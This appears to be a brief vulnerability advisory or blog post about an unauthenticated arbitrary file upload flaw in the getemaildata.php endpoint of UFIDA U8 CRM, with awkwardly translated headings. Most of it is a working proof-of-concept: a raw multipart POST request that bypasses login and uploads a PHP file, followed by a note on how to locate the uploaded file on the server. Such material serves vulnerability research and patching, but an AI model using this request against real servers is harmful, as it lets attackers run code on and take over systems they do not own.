Ufida U8 Crm Customer Relationship Management System Getemaildata Php Any File Upload Vulnerability
Ufida U8 Crm Customer Relationship Management System Getemaildata Php Any File Upload Vulnerability
UFIDA U8 CRM customer relationship management system getemaildata.php any file upload vulnerability
Vulnerability Description
UFIDA U8 CRM customer relationship management system getemaildata.php file has any file upload vulnerability. The attacker can obtain server permissions through the vulnerability and attack the server.
Vulnerability Impact
UFIDA U8 CRM Customer Relations Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ
File name requires hexadecimal minus one
/tmpfile/updD24D.tmp.php
This post is licensed under CC BY 4.0 by the author.